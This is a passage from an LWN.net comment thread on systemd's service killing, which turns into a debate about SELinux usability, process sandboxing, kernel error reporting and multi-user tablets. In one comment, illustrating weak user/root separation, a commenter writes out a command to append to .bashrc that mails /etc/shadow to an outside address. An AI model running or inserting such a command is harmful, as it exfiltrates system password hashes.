systemd for administrators - killing services
So again, what is so new and fancy about killing services in systemd? Well, for the first time on Linux we can actually properly do that. Previous solutions were always depending on the daemons to actually cooperate to bring down everything they spawned if they themselves terminate. However, usually if you want to use SIGTERM or SIGKILL you are doing that because they actually do not cooperate properly with you."
Posted Nov 19, 2010 20:37 UTC (Fri)
by martinfick (subscriber, #4455)
[Link] (53 responses)
Now, all we need is users to become hierarchical, and perhaps systemd could even help with this. Every real (human) user should on login be started in its own isolated lxcontainer. In this container the human is root and can su to any subuser. Next, like in android, each high level application that a human user runs could then run as its own userid inside this container. Human users could this way shield their data from their apps, something which sadly they cannot do today in unix unless you pretend it is a single user system.
Posted Nov 19, 2010 21:01 UTC (Fri)
by SEJeff (guest, #51588)
[Link] (39 responses)
You might also read up on sVirt[2] which mixes vms and SELinux for Information Assurance.
[1] http://www.cs.utah.edu/flux/fluke/html/flask.html
Posted Nov 19, 2010 21:16 UTC (Fri)
by martinfick (subscriber, #4455)
[Link] (9 responses)
As for the bad wrap, well, perhaps it is deserved. I can't get my head around what these tools do by reading any of the intro pages to these products, but I can wrap my head around the android security model in about one sentence.
Posted Nov 19, 2010 22:02 UTC (Fri)
by drag (guest, #31333)
[Link] (8 responses)
The people that program the applications and/or build the packages, or at least should be.
Selinux policies should be bundled with the application to make any sense at all really. We don't go around editing a global configuration file or set of configurations in /etc/posix_acls/ whenever we install software, do we?
Imagine how much of a nightmare that would be, having to edit a M4 script to set configurations on your home directory and such:
Ok... so I want to share a file in /tmp/. I need to go in and copy and past the /tmp configuration file out of /etc/posix_acls/directories/ and then make a new file for it, edit the directory stuff out, then add a new permission, go back into /etc/posix_acls/, run make, run /etc/init.d/posix_acls apply and then that's it.
Then, just to make it easy, I will have a little icon in my desktop that will pop up when somebody else tries to access /tmp/shared_file and they don't belong to the newly created tmp_shared_file group-role. It pop up and say something to the effect of:
And what is worse is that SELinux is exponentially more complicated.
Something like that.
SELinux itself a wonderful thing, but it's so unusable that it might as well not exist. For the majority of people and use cases it provides no benefit.
They need to rethink the design, get rid of the nightmare macro language configurations, lay things out in a hierarchical tree that makes it obvious how things are inherited and such things.
I invision a Selinux shell were you can navigate around the file system and examine running processes, see open files being used and so on and so forth. Something that makes it easy to understand what is going on. Something like that.
Until a average administrator with a few hours of exposure can point out any random file on a file system and be able to figure out quickly (under five seconds) what happens when Apache or other process tries to touch it then it's not going to be something that is useful.
Posted Nov 19, 2010 22:15 UTC (Fri)
by martinfick (subscriber, #4455)
[Link] (7 responses)
In other words, if user writes a new script and wants to test it out on some files, can he prevent any bugs in his script from deleting all the files in his home directory? Then, once he trusts the script, can he allow it to actually modify files in his home dir without requiring root privileges (remember, this is a multi user system, he is not root)?
Admins want to control what users do, they write security tools aimed at that. But what about users, how can I protect myself from myself without relying on an admin (or application packager) to have anticipated my personal use cases?
Posted Nov 19, 2010 22:29 UTC (Fri)
by drag (guest, #31333)
[Link] (6 responses)
Then it should be possible that a user should be able to launch the 'selinux-shell' (or sesh for short :P ) to be able to control the rights of individual processes in his 'delegated realm'.
----------------------------
However you may be correct in thinking that with the new and powerful tools we have like LXC that can be used for carving up namespaces in Linux in a secure manner that there really is no good reason why each user cannot just be root and use normal Unix-style user and group permissions to control the rights of individual applications. Much like Android.
Posted Nov 20, 2010 3:25 UTC (Sat)
by elanthis (guest, #6227)
[Link] (5 responses)
There is an SELinux sandbox utility, but it's an all-or-nothing solution; I can use it remove a process's ability to do just about everything, or I can run the process with full default access.
Posted Nov 21, 2010 8:43 UTC (Sun)
by epa (subscriber, #39769)
[Link] (3 responses)
You have to become root to set any policy even though it may apply only to processes you own? No wonder virtualization is so popular, when the ability for independent groups to share a single Linux instance keeping out of each other's way is so limited.
(Not trying to blame you personally for SELinux's deficiencies or imply that you are defending them - just really surprised that security software, of all things, makes the Windowsish error of requiring administrator access to be useful for anything.)
Posted Nov 21, 2010 19:55 UTC (Sun)
by jackb (guest, #41909)
[Link] (2 responses)
I believe that is what the phrase "mandatory access control" means. The administrators set the policy and the users have no choice but to follow it.
Posted Nov 21, 2010 21:58 UTC (Sun)
by drag (guest, #31333)
[Link]
MAC means that you have controls that exist for a user account that are not controllable by the user account.
That does not preclude you delegating portions of your policy as part of your policy.
What if you have multiple administrators? Do you want to give them all unrestricted root access all the time to be able to do their jobs?
Posted Nov 22, 2010 10:32 UTC (Mon)
by epa (subscriber, #39769)
[Link]
Posted Nov 21, 2010 18:01 UTC (Sun)
by nix (subscriber, #2304)
[Link]
More important I think is that the SELinux configuration comprises a graph of privilege transitions, and adding extra transitions to that graph might very well break invariants root is depending on for the security of the system. I see no reason why we couldn't allow the user to add new privilege transitions to that graph, as long as they could only transition *from* root-added contexts, not *to* them. But, as far as I know, this is not implemented.
Posted Nov 19, 2010 21:22 UTC (Fri)
by jwb (guest, #15467)
[Link] (28 responses)
For my part, I have long looked upon SELinux as the means by which random RedHat insiders screw up otherwise perfectly good software. Probably if it had better logging and meaningful error codes and management tools that can be explained in less than an hour people would look upon it more favorably.
Posted Nov 20, 2010 0:05 UTC (Sat)
by donwaugaman (subscriber, #4214)
[Link] (26 responses)
SELinux's answer to everything is EPERM + log reason for denial to /var/log/audit/audit.log. It's a little bit like asking a teenager to do something, getting a "NO!" response, and then having to look in their diary for why.
It would be nice, although not thread-safe, for an app that suspects it's being denied by SELinux to be able to query for a better "reason" for the previous denial. Something tells me that the kernel maintainers don't exactly want to get into the business of creating a per-process rich error reporting facility, to say nothing of the difficulties in designing one that is abstracted for other security systems.
Posted Nov 20, 2010 14:42 UTC (Sat)
by tialaramex (subscriber, #21167)
[Link] (25 responses)
We were lucky in the early days of Linux to have people who'd grown up on Unix systems and were not too shocked to discover that just because the file exists doesn't mean you can delete it. The variations from the Unix wars period meant that even if your sysadmin cursed at tools like ps or df for having the "wrong" behaviour compared to what they grew up with, they weren't actually surprised.
Now we have to wait for a generation of "Well the POSIX permissions check out, so it's clearly broken, let's just switch off SELinux" to collect their pensions and be replaced by people who know to look in the logs, know how to interpret what the logs mean, etc. This isn't really so different from waiting for the generation of programmers who swore up and down that they didn't need version control to go collect _their_ pensions.
Posted Nov 20, 2010 19:14 UTC (Sat)
by drag (guest, #31333)
[Link]
This is not going from 'being able to crank a motor' to 'operate the sat nav'.. this is going from 'Being able to start a Model-T' to 'being able to crank a motor on a sat nav satellite in orbit by hand'. Your going from requiring 'Old Timers' to use 'ls -l' and understanding user, group, and other permission model to requiring the understanding of every esoteric detail of Linux userland, configuration files that reach a whole new level in complexity and size, AND still have a deep understanding of everything that every Linux/Unix administrator had to know in the past.
The log files are very much less useful then you assume, I think. Whenever I use Fedora the command lines, permission fixes and whatnot that get recommended by the tools are telling me to open up SELinux permissions in a overly wide manner. Following the advice given to you by the SELinux tools and the configuration files is really a bad idea.
Plus SELinux needs to get rid of the Marco-language-based configuration files. You would think that people would of learned why this is a horrible idea from Sendmail...
In terms of actually increasing the security of Linux systems it's only useful, so far, in improving certain types of network services. If your a organization that has a few hundred thousand dollars to drop on improving security in your servers then SELinux may make sense since you can hire the experts and drop a huge a amount of time customizing SELinux to your specific configurations.
But for any sort of desktop solution or whatever then SELinux is worthless. The only way it works acceptably now is by simply removing all policy restrictions on applications ran from local terminal and even then people still regularly run into issues with it. There is no point for it to even be there if your going to run the policies like that since it's going to utterly worthless against the sort of threats and problems that desktops are likely to run into.
I like SELinux and I think that it can be something good, but saying 'oh people just need to learn to read log files' is utterly missing the point on why it sucks and why people are not finding any purpose to it's existence.
Posted Nov 21, 2010 1:26 UTC (Sun)
by jwb (guest, #15467)
[Link] (3 responses)
Also, you can take your ignorant ageism and cram it.
Posted Nov 21, 2010 16:59 UTC (Sun)
by tialaramex (subscriber, #21167)
[Link] (2 responses)
I catch myself with these same attitudes, and I have to go back and re-assess, did I just dismiss this solution because it's actually technically deficient for our purpose, or because it's unfamiliar and I'd rather use something I already know?
Posted Nov 21, 2010 22:11 UTC (Sun)
by dlang (guest, #313)
[Link]
you already know the pitfalls and traps of the one approach, you don't yet know the problems with the new tool. I see a lot of people who see the claims of the new tools (even in opensource tools), and assume that they don't have problems and will 'just work', ignoring the fact that _every_ tool has problems and limitations, you will need to learn those as well.
I've seen companies paralyzed for years because of poor decisions to depend on new stuff instead of getting something done with existing capabilities.
I'm not saying that learning something new is bad by any means, but I am saying that there can be a significant amount of value in leveraging existing knowledge.
the hard thing is to find the balance between the two extremes, one the one extreme you shoehorn things into tools that really don't fit (or don't do something because the exiting tools don't work and you don't want to learn the new ones), on the other extreme you spend all your time studying new tools and finding the problems with them and don't get projects accomplished because you spent the time on the groundwork for the new tools instead.
Posted Nov 22, 2010 6:51 UTC (Mon)
by malor (guest, #2973)
[Link]
There's lots of 'tools du jour' in the computer world, fads that come and go. Identifying the ones with lasting value is not an easy thing, and if you choose poorly, it can cost your company a very great deal of time and money.
If you try to jam prospective hires into a bad framework, you'll lose most of their value. By asking them something like "How much effort are you willing to put into Ruby on Rails?", you're short-circuiting a great deal of their experience. Ask them questions like, "We're doing X. How would you go about architecting that?" You may just find that their napkin solution is better than what you already have.
Posted Nov 21, 2010 8:49 UTC (Sun)
by epa (subscriber, #39769)
[Link] (19 responses)
Long ago somebody came up with the excellent idea of error return codes so you could see why an operation failed without having to dig through a logfile. It's unfortunate that the return code is just a single integer, which doesn't give much information. The system call needs to return an error string as well.
In a generation, the culture of 'a single fixed integer error code was good enough when we were growing up, so it's good enough now' will die out, new variants of system calls will be introduced returning usable and detailed error messages, and apps will quickly switch over to them. At that point SELinux and similar schemes will be easy to set up and fix, and people won't need to disable them to get predictable error behaviour.
(Yes, if you return strings for errors as well as integers then there are internationalization issues and other warts. I don't see how this can possibly be worse than cramming everything into a choice of 40 or so fixed integers.)
Posted Nov 21, 2010 11:32 UTC (Sun)
by Cyberax (✭ supporter ✭, #52523)
[Link] (18 responses)
Error strings are not good. Exceptions are really what you need, they can provide both programmatic and textual description of a problem. And they should be inheritable, so your code can check for generic FileSystemProblemException or for fine-grained FilePermissionException.
Adding C-language interface with exception support is possible, though a bit clumsy.
Posted Nov 21, 2010 18:33 UTC (Sun)
by elanthis (guest, #6227)
[Link] (2 responses)
If you're looking for the automatic propagation of exceptions up through the call chain, then yes it's clumsy, but it's not any better even in C++. Exceptions and low-level programming are not compatible. Writing "exception safe" code in C++ is damn near impossible at times, and they are easily the one big failure of C++'s design.
Posted Nov 22, 2010 0:28 UTC (Mon)
by Cyberax (✭ supporter ✭, #52523)
[Link] (1 responses)
Yes, that's what I was thinking. It's possible, but not easy.
>Exceptions and low-level programming are not compatible. Writing "exception safe" code in C++ is damn near impossible at times, and they are easily the one big failure of C++'s design.
You might want to look into Windows drivers. They use SEH (Structured Exception Handling) quite thoroughly in kernel mode.
Posted Nov 22, 2010 14:39 UTC (Mon)
by dgm (subscriber, #49227)
[Link]
When you take into account that Microsoft atributes most of BSODs in Windows to poorly developed drivers, it doesn't sound like a great idea any more.
Posted Nov 21, 2010 23:51 UTC (Sun)
by jzbiciak (guest, #5246)
[Link] (14 responses)
I think you have the API direction inside out, though. If the kernel returned an "error details" structure, a nice POD struct you could ignore if you so choose, you get all the value the kernel has to offer in terms of telling you what happened, without requiring the language to support exceptions. You also remain backward compatible.
Languages that do offer exceptions could then offer to throw exceptions based on the contents of this error detail structure as an optional feature. Exceptions in C++ can be rather tricky, and so there could be very good reasons why a programmer chooses not to enable them. Also, existing programs aren't expecting these new exceptions anyway.
You could then standardize the set of exceptions, offer them in the standard library, and step back and let people start using them where they find them useful. Others could sit back and rely on the error reporting structure. And the rest of the world can continue to muddle on with errno until they upgrade their software.
Finally, folks could then start upgrading the core OS components (such as cat, cp, mv, etc.) to understand the additional error details to provide better error reporting over time. Now you have a migration path. And if some crusty old program that won't be upgraded can't open a file, basic commands such as "cat file > /dev/null" would be able to give you what you need to know.
At least, that's a first cut at how I'd approach it.
Posted Nov 22, 2010 0:30 UTC (Mon)
by Cyberax (✭ supporter ✭, #52523)
[Link]
We'll have problems in the intermediate libraries. For example:
FILE *fl=...;
We can work around this to a certain degree, of course.
Posted Nov 22, 2010 10:30 UTC (Mon)
by epa (subscriber, #39769)
[Link] (8 responses)
Posted Nov 22, 2010 14:20 UTC (Mon)
by Cyberax (✭ supporter ✭, #52523)
[Link] (3 responses)
That's the point of exceptions - you DON'T need to enumerate everything in advance.
For example, an application can check for a generic PermissionException. Which can later be subclassed as PosixPermissionException and SELinuxPermissionException. So sophisticated applications can check for these exceptions while older applications will just detect a generic permission error.
Posted Nov 22, 2010 23:49 UTC (Mon)
by marcH (subscriber, #57642)
[Link]
Posted Nov 24, 2010 11:41 UTC (Wed)
by epa (subscriber, #39769)
[Link] (1 responses)
For example, an application can check for a generic PermissionException. Which can later be subclassed as PosixPermissionException and SELinuxPermissionException.
Providing programmatic information, whether by a runtime-inspectable class hierarchy or any other way, is excellent. It doesn't remove the need for informative error messages so that humans can diagnose problems.
Posted Nov 24, 2010 11:52 UTC (Wed)
by Cyberax (✭ supporter ✭, #52523)
[Link]
Posted Nov 22, 2010 15:49 UTC (Mon)
by jzbiciak (guest, #5246)
[Link]
What stops you from defining the error return structure as, say: You don't need to enumerate all possible failure modes in advance. You merely need to build in some future-proofness, along with a way for code to recognize whether it can or can't handle the information it's provided. You can keep adding new error formats to the union without breaking current users. If you factor enough of the most common information out (ie. add enough general purpose fields where I put "put some more common fields here"), then most programs won't even need to look into 'details' for further details. Any standardized "human-readable report" formatter should be updated whenever we add more formats to the "details" union. And finally, programs that actually can take proactive action given a complex error report can actually do their job without having to parse a string. Exception-reporting languages can go nuts constructing whatever fancy exception object they like using subclasses as needed to provide fine grain distinctions when possible. But, if you really, really wanted to provide an error string as an escape valve, nothing stops you from doing this:
Posted Nov 22, 2010 21:05 UTC (Mon)
by mfedyk (guest, #55303)
[Link] (2 responses)
Posted Nov 22, 2010 22:12 UTC (Mon)
by HenrikH (subscriber, #31152)
[Link]
Posted Nov 24, 2010 11:43 UTC (Wed)
by epa (subscriber, #39769)
[Link]
Posted Nov 23, 2010 0:30 UTC (Tue)
by vonbrand (subscriber, #4458)
[Link] (3 responses)
Great. It took GNU around 20 years to rewrite the basic commands for Unix, now you propose starting all over again.
Posted Nov 23, 2010 1:04 UTC (Tue)
by jzbiciak (guest, #5246)
[Link] (2 responses)
If the extended error information is made available to a tracing process, then you could possibly make a simple wrapper that captures and prints out the extended error details.
Anyway, I'm not seriously proposing someone go off and do all this. Rather, I'm describing where I'd start if I were to go off and do it and how I'd try build backward compatibility in. For most cases, this feels like massive, massive overkill.
Posted Nov 23, 2010 2:43 UTC (Tue)
by cmccabe (guest, #60281)
[Link] (1 responses)
Posted Nov 23, 2010 2:52 UTC (Tue)
by cmccabe (guest, #60281)
[Link]
Posted Nov 23, 2010 5:04 UTC (Tue)
by cmccabe (guest, #60281)
[Link]
I know I shouldn't take part in Yet Another Selinux flamewar, but I just can't resist...
I like the ideas behind selinux and I run it on my home computer. However, I can't help but feel that it is another example of a conflated design.
The problem is that UNIX processes run with way, way too much ambient authority. That much has been known since the 1980s (see "The Confused Deputy", a classic paper on the topic.) The distinction between user accounts and root accounts on most systems is paper-thin. For example, a compromised Firefox process could easily append "sudo cat /etc/shadow | mail boris@badunov.ru" to your .bashrc. Why not? The .bashrc is owned by you, not by root.
What we needed was a good sandboxing mechanism for processes. For instance, we need a way for processes to give up the ability to send network traffic, or access certain hardware devices. To keep processes from writing to your home directory or other sensitive places, we needed something like a beefed-up chroot. (I'm aware of the problems with allowing user processes to run chroot, but I'm talking about an administrator setup here.)
Given those primitive mechanisms, we could have implemented any security policy we wanted. Instead, what we got was selinux, smack, tomoyo and its brethren. selinux injects policy directly into the kernel through selinux, um, "policies." I'm glad that a DOD-compliant security system for Linux exists. However, I can't help but feel that most users, given the choice, would choose something much simpler. The problem is that by combining the mechanism and the policy, users have to choose all or nothing. Most sysadmins I have talked to laugh at me for being open-minded enough to even consider running selinux, and happily choose "nothing."
I think to make progress, we need to create "selinux from userspace." We should introduce a few simple and general syscalls to sandbox processes. Apple's sandbox_init, and LXC's mechanisms should be good starting points. Then we can implement all the policy of selinux in terms of these simple calls. Application developers, rather than distribution maintainers, should know about and use the syscalls. It may be that most users will choose a simpler policy than selinux. But they shouldn't forgo the mechanisms of mandatory access control security by doing so.
Posted Nov 20, 2010 0:08 UTC (Sat)
by mezcalero (subscriber, #45103)
[Link] (11 responses)
Posted Nov 20, 2010 0:58 UTC (Sat)
by martinfick (subscriber, #4455)
[Link] (10 responses)
Can you provide some of your insights about why you think that the namespacing thing might not be worth it? I can't help but think about how Neil Brown hinted at the problems with unix perms and how solutions similar to namespacing could potentially help:
http://lwn.net/Articles/414618/
Of course, such a solution might still suffer from the problems associated with unix perms which he points out in this same article. But I wonder if shifting the perms model to apply to applications instead of humans would alleviate some of the problems with the model? Now, a human could control group membership easily, so it might be easier to get right, and adapt when it's wrong?
Either way, something has to be done to change the way we see security and user apps. There are new problems that are going to hit us real soon that even the android model will not address. The new internet devices will need a way for the GUIs and apps to be multi user safe.
I should be able to pass you my tablet with a web page for you to read without you being able to lookup my passwords or read my email. GUI's are going to need to be able to function in mixed kiosk/user modes. In other words, users are not going to want to have to login to a device like a tablet every time they pick it up. For a phone, that is OK, but not for a tablet.
A tablet should be by default in a safe kiosk mode so that it can be passed around the kitchen table while everyone watches a youtube video. The tablet owner should not have to be concerned about his user data being accessed when he goes to the bathroom. But, conversely, any user at that table should then be able to check their email easily without worrying about the fact that their password is now known to the device's owner. Perhaps authentication is done by prompting the user via their cell phone, via bluetooth?
With a default kiosk mode, a user should only be prompted for authentication once they do something restricted. And once they authenticate, they should be able to continue where they left off before authentication. At the flick of a button, or after a non use timeout, the device should switch back to kiosk mode while attempting to preserve as much state as possible. This is all really tricky, but it needs to be solved soon to make devices truly useful without being completely insecure. We may soon see how flexible unix is or isn't by how well it can handle these new use cases.
I know, mostly off topic with systemd, sorry. I have a nail and systemd looked like a hammer...
Posted Nov 20, 2010 3:38 UTC (Sat)
by elanthis (guest, #6227)
[Link] (6 responses)
if you're looking for per-application namespacing, things get a lot more complicated. for user-defined namespacing, you run into all the classical security issues of what happens when a user runs a setuid binary inside a specially-crafted chroot jail. on the application level, you are interested in a lot more than just broad filesystem privileges; saying that Firefox is limited to read-only access to everything but its own cache directory sounds nice at first, but then you realize that people like to be able to download and save stuff from the Web, and they may well want to be able to save directly to anywhere in $HOME and not just ~/Downloads... so at best you're back to the per-user namespace/jail setup.
what something liek SELinux can do is limit things on a much finer level. Not only do you want Firefox to be limited to writing to $HOME, but you also want to limit what executables it can invoke. However, you can't just give Firefox a filesystem view with the executable bit off on every file, because you need to let it invoke a small handful of binaries it uses which are kind of spread out all over. You probably want it to be able to invoke viewers for files, for instance (say, an archive reader for that .ZIP you just downloaded). this can be farmed out to other binaries like gnome-open, but that then has to be executable by Firefox. then since the binaries run need their own set of privileges which may be broader than Firefox's, you need some kind of secure system that watches for transitions between contexts like that and sets a new environment instead of simply inheriting Firefox's. and this system is SELinux (or one of the similar alternatives).
unfortunately, back in the realm of efficiency/security, these services run in the kernel and are not safely editable by users. it may be possible to have the service integrate with a daemon that can check for user-defined rules and merge those with the administrator defined ones (never allowing a user to grant more privileges, only allowing them to take privileges away), but there's an assortment of issues that would need to be worked out there regarding race conditions and interfaces and making sure the daemon couldn't inadvertently screw up the whole system if it hangs or starts feeding garbage back to the kernel.
and you can get into potential loops where the daemon needs to read a user config file, which is stored on a FUSE mount, which runs a program to access the filesystem, which goes through kernel access control, which queries the daemon, which needs to read a user config file...
Posted Nov 20, 2010 13:00 UTC (Sat)
by gmatht (guest, #58961)
[Link] (3 responses)
Not only do you want Firefox to be limited to writing to $HOME ... Not necessarily, as we might want to save to /mount/My_usb_stick or /mnt/large_partition_for_big_files. Even if we knew that we could limit Firefox to writing to $HOME, data outside $HOME is typically already protected by standard UNIX permissions. What I would want is to limit applications such Firefox so they can only write (or read) documents that are selected in the file chooser. This was achieved in Plash my overriding GtkFileChooserDialog to call a trusted powerbox; unfortunately Plash seems to be suffering from bitrot.
Posted Nov 20, 2010 13:15 UTC (Sat)
by slashdot (guest, #22014)
[Link] (1 responses)
Right now, Unix security is mostly useless because random applications can still damage all the user data, which just makes no sense.
Applications should only be able to read common system data, read/write to their per-user per-app configuration directory, and access files specifically selected by the user with a special GUI/CLI.
But of course Linux seems to continuously have new local root holes discovered, so until this is somehow fixed, everything else doesn't really matter.
Posted Nov 20, 2010 13:56 UTC (Sat)
by cesarb (subscriber, #6266)
[Link]
Security is not an all or nothing.
For instance, local root holes are not always available. They tend to be fixed quickly after being announced to the world. And unless you are in the "window of vulnerability" which follows the announcement and precedes the patch being applied to your system (this window can be quite small if the vulnerability was first disclosed to the distributions), you are only vulnerable to attackers who are able to discover or buy a new local root vulnerability.
And also, local root holes are not always exploitable from within the application. If a bug in an application allows only for "arbitrary file disclosure" (it can read any file and send it to the attacker), it is still a very bad thing if you have private data on the same user account and the attacker knows its file name, but it probably will not allow enough access to be able to exploit any local root hole. The same would probably still apply if the vulnerability allowed the attacker to delete any file they know the name of, of even if the attack allowed any file to be overwritten with static (not controlled by the attacker) junk data.
And finally, it is still one more barrier the attacker has to jump over. Not only he has to write an exploit to the application, they now also have to integrate within it either a local root hole or an exploit to whatever sandboxing technology you are using. They have to continuously update it as new local root holes or sandboxing exploits are fixed or get available. If you are lucky, your sandboxing prevents the attacker from being able to exploit the local root hole (for instance, if it needs to use a syscall which the sandbox you use denies, or if it needs to write to a file your sandbox will not let it to).
Posted Nov 22, 2010 12:50 UTC (Mon)
by Karellen (subscriber, #67644)
[Link]
Or maybe, if you ban it from reading files that are not explicitly selected by the user, when firefox calls getpwnam() to figure out your username and possibly real name (if you keep that in the gecos field), you want libc's call to open /etc/passwd to require user intervention???
Posted Nov 21, 2010 16:29 UTC (Sun)
by Cyberax (✭ supporter ✭, #52523)
[Link]
So instead you make a 'file system access' daemon which works in a separate process and exposes 'Show Filesystem Dialog and return a file handle' function. Like Chrome does, for example.
It's a bit like capability based security.
Posted Dec 1, 2010 0:03 UTC (Wed)
by ibukanov (subscriber, #3942)
[Link]
A browser should not need even a read access to user files. To safe a file it would talk to some saving service that would perform a saving operation after asking a user for a confirmation. This way a compromised browser could at best ask for a user confirmation to write a data stream somewhere. A sensible saver would not even allow to overwrite existing files adding name prefixes preventing many social engineering attacks. Similarly to attach files the browser would need to talk to another service.
UNIX permission model is enough to cover this if a user can have an extra account and group for each network application it uses perhaps with an extra home directory subtree. Then normal permission setup with UNIX domain sockets as communication endpoints to save files etc. would provide rather secure system without the complexity of SELinux.
Posted Nov 23, 2010 4:09 UTC (Tue)
by cmccabe (guest, #60281)
[Link] (2 responses)
What's wrong with Android's security model? It sounds like exactly what you want. Each application is sandboxed with only the capabilities that the user allowed it to have when it was installed.
> I should be able to pass you my tablet with a web page for you to read
Well, the iPad shipped without any kind of multi-user support at all. So apparently some fairly smart designers in Cupertino disagree with you.
In general, users tend to hate complexity and love simplicity. It's a lot simpler to just buy your kid a separate tablet than it is to fiddle with complex security protocols. Especially when the cost of the tablets gets into the $100 or $200 range, that's the solution that a lot of people are going to take.
It seems like Android could support a simple form of multi-user operation through virtualization. Something like LXC or vserver could provide separate environments for separate users. It should be fairly simple to switch back and forth between users. Since all the daemons would be running in separate containers, there would be no information leakage between the environments.
I guess there is the thorny question of how to share data between different user accounts. I would argue that, at least at first, the two options should be "share with all" and "share with none". The former should just do a global install in some kind of upper-level container that everyone can see. Then the data can be shared with all users. The latter can keep it all private. Add password protection, and you've reached the same level of functionality that MacOS, Windows 7, or Linux ever had. You could probably add more and more security features over time, but there's very little evidence that home users of a tablet want them or could understand them.
Posted Nov 23, 2010 5:49 UTC (Tue)
by martinfick (subscriber, #4455)
[Link] (1 responses)
I believe I clearly answered that question in the section you quoted? Where in android is there ANY support for more than one human user?
> Well, the iPad shipped without any kind of multi-user support at all. So apparently some fairly smart designers in Cupertino disagree with you.
I am sure they are very smart, but I spend very little time thinking about them. What does it matter since they obvisouly do not care about my needs or desires?
> In general, users tend to hate complexity and love simplicity. It's a lot simpler to just buy your kid a separate tablet than it is to fiddle with complex security protocols. Especially when the cost of the tablets gets into the $100 or $200 range, that's the solution that a lot of people are going to take.
Simplicity is great. However, even at $100 a pop, I would expect to be able to read my email on my tablet without revealing my password to anyone I happen to show a youtube video to. The cheaper the device, the more likely it will be passed around, shared (people will have less concern for the integrity or loss of the device). I owned a tablet for one week, and this was my first concern when I had guests over. I wouldn't tell you that you should care, but clearly, I do.
> Something like LXC or vserver could provide separate environments for separate users
It seems that perhaps someone suggested that in the first post of this thread. ;)
> You could probably add more and more security features over time, but there's very little evidence that home users of a tablet want them or could understand them.
Well, I thik I know at least one user who wants and could understand it (if done well, the whole point of this disscussion, no?) After reading some of the responses in this thread, I suspect that I am not completely alone. Where is your evidence that no one wants it, or did you just mean that figuratively?
Posted Nov 23, 2010 8:24 UTC (Tue)
by cmccabe (guest, #60281)
[Link]
The notion that users are fundamental to the security model is what's wrong with security on desktop operating systems. It's the capabilities that applications run with that are fundamental-- the more limited, the better.
Running multiple user environments side by side is trivial. It doesn't affect the security model at all. The really interesting question is how those environments share data.
> Where is your evidence that no one wants it, or did you just mean that
I never claimed that nobody wanted multi-user support. I'd like it, especially the ability to have a guest account on my phone, capable of making calls but nothing else.
I just feel kind of frustrated when people announce that gosh, something is the most important feature ever, because they "know at least one user who wants and could understand it."
Posted Nov 20, 2010 19:04 UTC (Sat)
by ebiederm (subscriber, #35028)
[Link]
Posted Nov 20, 2010 14:21 UTC (Sat)
by loevborg (guest, #51779)
[Link] (14 responses)
Posted Nov 20, 2010 15:13 UTC (Sat)
by AlexHudson (guest, #41828)
[Link] (9 responses)
Posted Nov 20, 2010 21:45 UTC (Sat)
by HelloWorld (guest, #56129)
[Link] (7 responses)
Posted Nov 21, 2010 3:43 UTC (Sun)
by Tara_Li (guest, #26706)
[Link] (4 responses)
Posted Nov 21, 2010 12:48 UTC (Sun)
by MisterIO (guest, #36192)
[Link]
Posted Nov 21, 2010 18:08 UTC (Sun)
by nix (subscriber, #2304)
[Link] (1 responses)
Posted Nov 22, 2010 0:05 UTC (Mon)
by Tara_Li (guest, #26706)
[Link]
Posted Nov 24, 2010 23:40 UTC (Wed)
by AndreE (guest, #60148)
[Link]
Posted Nov 23, 2010 0:45 UTC (Tue)
by rsidd (subscriber, #2582)
[Link] (1 responses)
Posted Nov 23, 2010 9:40 UTC (Tue)
by mpr22 (subscriber, #60784)
[Link]
When the people who talk like that are talking to each other, it is correct usage. Language being the synchronically and diachronically variable thing that it is, correctness of usage is determined by context. (Also, to my mind "could of" is mostly only disagreeable because of how it's written - and it only achieves that because contemporary Modern English, thanks to the wonders of massive phonological shifts over the past several hundred years, routinely has severe disconnects between what sounds a word contains and what sounds it's spelled as if it contains.)
Posted Nov 21, 2010 8:54 UTC (Sun)
by epa (subscriber, #39769)
[Link]
Posted Nov 21, 2010 6:32 UTC (Sun)
by mfedyk (guest, #55303)
[Link] (1 responses)
--kill-user
Posted Nov 22, 2010 15:24 UTC (Mon)
by nye (subscriber, #51576)
[Link]
Strongly seconded. Even just changing it to '--kill-what' would be an improvement.
Posted Nov 22, 2010 13:48 UTC (Mon)
by mpr22 (subscriber, #60784)
[Link] (1 responses)
Command line parameters are not that kind of formal context. They are formal in the mathematical sense, but someone issuing peremptory commands to a subordinate (and you can be sure I consider my computer to be subordinate to me) is (a) not likely to care about honouring the who/whom nitpick (b) rather likely to be irritated if the subordinate gives them backchat over the matter.
Posted Dec 7, 2010 14:51 UTC (Tue)
by robbe (guest, #16131)
[Link]
Yessss, I'd like that. Kinda like the parser berating you in some Steve Meretzky text adventures.
I suggest depending it on an environment variable, akin to $POSIXLY_CORRECT.
Posted Nov 20, 2010 16:06 UTC (Sat)
by charlieb (guest, #23340)
[Link] (7 responses)
Really? Didn't DJB's daemontools solve that problem in the 90s?
http://cr.yp.to/daemontools.html
Posted Nov 20, 2010 22:46 UTC (Sat)
by ejr (subscriber, #51652)
[Link] (1 responses)
Posted Nov 22, 2010 23:53 UTC (Mon)
by marcH (subscriber, #57642)
[Link]
> Just how we work.
not?
Posted Nov 21, 2010 1:23 UTC (Sun)
by jwb (guest, #15467)
[Link] (4 responses)
Posted Nov 21, 2010 3:42 UTC (Sun)
by wahern (subscriber, #37304)
[Link]
Posted Nov 21, 2010 15:45 UTC (Sun)
by charlieb (guest, #23340)
[Link] (2 responses)
I don't know where *you* got that idea. I was referring to killing services (by reliable delivery of signals to them). A properly written service will kill its own children.
> It is completely up to the author of the service script to handle
The service program, whether it be script or otherwise. But that is often distinct from a service 'run' script, which will usually exec the service itself. The run script will very seldom be responsible for killing children - it will have long ago already terminated, via exec.
See also:
Posted Nov 22, 2010 16:23 UTC (Mon)
by martinfick (subscriber, #4455)
[Link]
Did you miss the point about why you may want to kill a service in the first place? Hint: because it may no longer be behaving.
Posted Nov 22, 2010 18:22 UTC (Mon)
by vonbrand (subscriber, #4458)
[Link]
I'd much prefer "properly written services" not bothering at all with anything except offering said service. Just check out how you can write a fully functional network service in less than a half dozen lines of shell (!) if you use {,x}inetd...
Posted Nov 20, 2010 17:30 UTC (Sat)
by mheily (subscriber, #27123)
[Link] (21 responses)
However, since System V-style init scripts are the biggest competitor to systemd, they aren't mentioned at all. This is standard advertising technique, just as you wouldn't expect an ad for Coke to say "it tastes as good as Pepsi, but is not as sweet".
Lennart Poettering does bring up a good point about badly behaved daemons that don't kill their child processes properly when you send the parent a SIGTERM signal. The correct solution to this problem is to fix the daemon so that installs a signal handler to kill and reap any child processes upon receipt of a SIGTERM signal. Having systemd automatically send a SIGTERM to each child process is not going to magically make the child process terminate cleanly.
